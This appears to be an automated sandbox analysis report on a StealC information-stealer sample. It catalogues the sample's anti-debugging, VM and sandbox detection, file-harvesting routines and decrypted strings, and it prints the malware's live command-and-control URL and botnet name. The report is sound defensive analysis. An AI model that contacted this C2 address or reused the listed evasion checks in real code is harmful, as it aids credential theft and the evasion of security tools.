Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57C5DF second address: 57C610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F3D90F37F20h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 jmp 00007F3D90F37F22h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57C610 second address: 57C616 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57C616 second address: 57C61C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58CFE5 second address: 58CFFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D90D93B52h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58CFFB second address: 58D001 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58D001 second address: 58D045 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3D90D93B57h 0x00000008 jmp 00007F3D90D93B53h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jp 00007F3D90D93B4Ch 0x00000016 pushad 0x00000017 jnl 00007F3D90D93B46h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58CD6B second address: 58CD71 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59BD86 second address: 59BDA1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F3D90D93B52h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59CA85 second address: 59CA89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59CBCA second address: 59CC01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F3D90D93B46h 0x0000000a ja 00007F3D90D93B52h 0x00000010 push edx 0x00000011 jmp 00007F3D90D93B58h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59E4D8 second address: 59E4E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007F3D90F37F18h 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59E4E9 second address: 59E4FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B4Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A0F44 second address: 5A0F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A1440 second address: 5A146C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F3D90D93B4Dh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A146C second address: 5A1470 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A1470 second address: 5A14AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3D90D93B4Bh 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007F3D90D93B59h 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push ecx 0x00000018 js 00007F3D90D93B4Ch 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A44FC second address: 5A4518 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90F37F20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F3D90F37F18h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A4518 second address: 5A4539 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3D90D93B59h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A4539 second address: 5A453D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A617B second address: 5A6188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F3D90D93B46h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A6188 second address: 5A618C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A618C second address: 5A6192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A6192 second address: 5A61B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3D90F37F29h 0x00000009 js 00007F3D90F37F16h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC043B second address: 4FC044A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC044A second address: 4FC04DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90F37F29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F3D90F37F1Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F3D90F37F21h 0x00000017 and cx, 2D36h 0x0000001c jmp 00007F3D90F37F21h 0x00000021 popfd 0x00000022 mov ax, 4927h 0x00000026 popad 0x00000027 xchg eax, ebp 0x00000028 pushad 0x00000029 jmp 00007F3D90F37F28h 0x0000002e mov edi, ecx 0x00000030 popad 0x00000031 mov ebp, esp 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F3D90F37F23h 0x0000003a rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 30DD40 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 53ED53 instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Found evaded block containing many API calls

Source: C:\Users\user\Desktop\file.exe

Evaded block: after key decision

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000340F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_000340F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0002E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0002E530
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00021710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00021710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0002F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0002F7B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000347C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_000347C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00033B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_00033B00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00034B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00034B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0002DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0002DB80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0002EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0002EE20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0002BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0002BE40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0002DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0002DF10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00021160 GetSystemInfo,ExitProcess,

0_2_00021160

Source: file.exe, file.exe, 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1800359502.0000000001032000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWn
Source: file.exe, 00000000.00000002.1800359502.0000000001032000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1800359502.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1800359502.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareQ
Source: file.exe, 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000002.1800359502.0000000001004000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00024610 VirtualProtect ?,00000004,00000100,00000000

0_2_00024610

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_00039BB0

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00039AA0 mov eax, dword ptr fs:[00000030h]

0_2_00039AA0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00037690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,

0_2_00037690

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 4600, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00039790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		0_2_00039790
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000398E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,		0_2_000398E0

Source: file.exe, file.exe, 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: gProgram Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00067588 cpuid

0_2_00067588

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00037D20

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00037B10 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,

0_2_00037B10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000379E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_000379E0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00037BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_00037BC0

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1800359502.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1756543501.0000000004E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 4600, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1800359502.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1756543501.0000000004E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 4600, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.206	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.206/6c4adf523b719729.php	true		unknown
http://185.215.113.206/	true		unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Found malware configuration

Source: 0.2.file.exe.20000.0.unpack

Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.file.exe.20000.0.unpack	String decryptor: INSERT_KEY_HERE
Source: 0.2.file.exe.20000.0.unpack	String decryptor: 30
Source: 0.2.file.exe.20000.0.unpack	String decryptor: 11
Source: 0.2.file.exe.20000.0.unpack	String decryptor: 20
Source: 0.2.file.exe.20000.0.unpack	String decryptor: 24
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetProcAddress
Source: 0.2.file.exe.20000.0.unpack	String decryptor: LoadLibraryA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: lstrcatA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: OpenEventA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: CreateEventA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: CloseHandle
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Sleep
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetUserDefaultLangID
Source: 0.2.file.exe.20000.0.unpack	String decryptor: VirtualAllocExNuma
Source: 0.2.file.exe.20000.0.unpack	String decryptor: VirtualFree
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetSystemInfo
Source: 0.2.file.exe.20000.0.unpack	String decryptor: VirtualAlloc
Source: 0.2.file.exe.20000.0.unpack	String decryptor: HeapAlloc
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetComputerNameA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: lstrcpyA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetProcessHeap
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetCurrentProcess
Source: 0.2.file.exe.20000.0.unpack	String decryptor: lstrlenA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: ExitProcess
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GlobalMemoryStatusEx
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetSystemTime
Source: 0.2.file.exe.20000.0.unpack	String decryptor: SystemTimeToFileTime
Source: 0.2.file.exe.20000.0.unpack	String decryptor: advapi32.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: gdi32.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: user32.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: crypt32.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: ntdll.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetUserNameA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: CreateDCA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetDeviceCaps
Source: 0.2.file.exe.20000.0.unpack	String decryptor: ReleaseDC
Source: 0.2.file.exe.20000.0.unpack	String decryptor: CryptStringToBinaryA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: sscanf
Source: 0.2.file.exe.20000.0.unpack	String decryptor: VMwareVMware
Source: 0.2.file.exe.20000.0.unpack	String decryptor: HAL9TH
Source: 0.2.file.exe.20000.0.unpack	String decryptor: JohnDoe
Source: 0.2.file.exe.20000.0.unpack	String decryptor: DISPLAY
Source: 0.2.file.exe.20000.0.unpack	String decryptor: %hu/%hu/%hu
Source: 0.2.file.exe.20000.0.unpack	String decryptor: http://185.215.113.206
Source: 0.2.file.exe.20000.0.unpack	String decryptor: bksvnsj
Source: 0.2.file.exe.20000.0.unpack	String decryptor: /6c4adf523b719729.php
Source: 0.2.file.exe.20000.0.unpack	String decryptor: /746f34465cf17784/
Source: 0.2.file.exe.20000.0.unpack	String decryptor: tale
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetEnvironmentVariableA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetFileAttributesA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GlobalLock
Source: 0.2.file.exe.20000.0.unpack	String decryptor: HeapFree
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetFileSize
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GlobalSize
Source: 0.2.file.exe.20000.0.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 0.2.file.exe.20000.0.unpack	String decryptor: IsWow64Process
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Process32Next
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetLocalTime
Source: 0.2.file.exe.20000.0.unpack	String decryptor: FreeLibrary
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetTimeZoneInformation
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetSystemPowerStatus
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetVolumeInformationA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetWindowsDirectoryA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Process32First
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetLocaleInfoA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetUserDefaultLocaleName
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetModuleFileNameA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: DeleteFileA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: FindNextFileA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: LocalFree
Source: 0.2.file.exe.20000.0.unpack	String decryptor: FindClose
Source: 0.2.file.exe.20000.0.unpack	String decryptor: SetEnvironmentVariableA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: LocalAlloc
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetFileSizeEx
Source: 0.2.file.exe.20000.0.unpack	String decryptor: ReadFile
Source: 0.2.file.exe.20000.0.unpack	String decryptor: SetFilePointer
Source: 0.2.file.exe.20000.0.unpack	String decryptor: WriteFile
Source: 0.2.file.exe.20000.0.unpack	String decryptor: CreateFileA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: FindFirstFileA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: CopyFileA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: VirtualProtect
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetLastError
Source: 0.2.file.exe.20000.0.unpack	String decryptor: lstrcpynA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: MultiByteToWideChar
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GlobalFree
Source: 0.2.file.exe.20000.0.unpack	String decryptor: WideCharToMultiByte
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GlobalAlloc
Source: 0.2.file.exe.20000.0.unpack	String decryptor: OpenProcess
Source: 0.2.file.exe.20000.0.unpack	String decryptor: TerminateProcess
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetCurrentProcessId
Source: 0.2.file.exe.20000.0.unpack	String decryptor: gdiplus.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: ole32.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: bcrypt.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: wininet.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: shlwapi.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: shell32.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: psapi.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: rstrtmgr.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: CreateCompatibleBitmap
Source: 0.2.file.exe.20000.0.unpack	String decryptor: SelectObject
Source: 0.2.file.exe.20000.0.unpack	String decryptor: BitBlt
Source: 0.2.file.exe.20000.0.unpack	String decryptor: DeleteObject
Source: 0.2.file.exe.20000.0.unpack	String decryptor: CreateCompatibleDC
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GdipGetImageEncodersSize
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GdipGetImageEncoders
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GdiplusStartup
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GdiplusShutdown
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GdipSaveImageToStream
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GdipDisposeImage
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GdipFree
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetHGlobalFromStream
Source: 0.2.file.exe.20000.0.unpack	String decryptor: CreateStreamOnHGlobal
Source: 0.2.file.exe.20000.0.unpack	String decryptor: CoUninitialize
Source: 0.2.file.exe.20000.0.unpack	String decryptor: CoInitialize
Source: 0.2.file.exe.20000.0.unpack	String decryptor: CoCreateInstance
Source: 0.2.file.exe.20000.0.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.file.exe.20000.0.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.file.exe.20000.0.unpack	String decryptor: BCryptDecrypt
Source: 0.2.file.exe.20000.0.unpack	String decryptor: BCryptSetProperty
Source: 0.2.file.exe.20000.0.unpack	String decryptor: BCryptDestroyKey
Source: 0.2.file.exe.20000.0.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetWindowRect
